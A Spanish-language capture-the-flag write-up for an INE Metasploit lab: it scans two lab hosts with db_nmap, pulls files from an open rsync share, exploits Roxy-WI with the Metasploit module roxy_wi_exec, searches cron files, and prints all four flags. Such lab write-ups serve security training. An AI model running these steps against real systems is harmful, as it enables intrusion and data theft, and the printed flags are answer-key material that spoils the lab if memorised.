~/write-ups/writeup-b607d93542
Host & Network Penetration Testing: The Metasploit Framework CTF 2
Imported from Notion: Host & Network Penetration Testing: The Metasploit Framework CTF 2
Aqui tenemos dos targets en la misma red, target1.ine.local y target2.ine.local
Empezamos con el primer target, haciendo un escaneo:
service postgresql start && msfconsole
db_nmap -sV -O target1.ine.local

Inspeccionamos el banner con:
rsync rsync://target1.ine.local

Que nos devuelve la primera flag: FLAG1_9c22cc05a6be4d6bacf41e4c82dec24e
Usamos este comando para inspeccionar que hay en backupwscohen
rsync -av rsync://target1.ine.local/backupwscohen/ .

Esto nos descarga todos los archivos (office_staff.vhd, pii_data.xlsx y TPSData.txt)
Analizamos cada contenido y vemos en pii_data.xlsx la segunda flag!

Aqui hemos terminado con la maquina víctima 1 ya que las siguientes pistas son de la segunda.
Procedemos como en la maquina 1 a escanearla:
db_nmap -sV -O target2.ine.local

Como podemos ver el puerto 80 esta abierto, investiguemos en firefox que vemos:

Buscamos en metasploit roxy-wi :
search roxy-wi

Y usamos el módulo exploit/linux/http/roxy_wi_exec
Configuramos todo lo necesario en:
show options

y explotamos:
exploit

Vamos a la raíz del sistema y vemos la tercera flag:

FLAG3_197fa63e7401457f82d86ed79333853f
Para la cuarta nos dan de pista:_ Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag._
A si que vamos a investigar los cron del sistema, como crontab no funciona toca hacerlo manual buscando en los archivos cron:
ls /etc/cron*

Analicemos cron.d :


Y ahí tenemos la 4ª flag en www-data-cron
FLAG4_9e25df036fc44382a413cf1115d485fb
- EOF -
<< back_to_index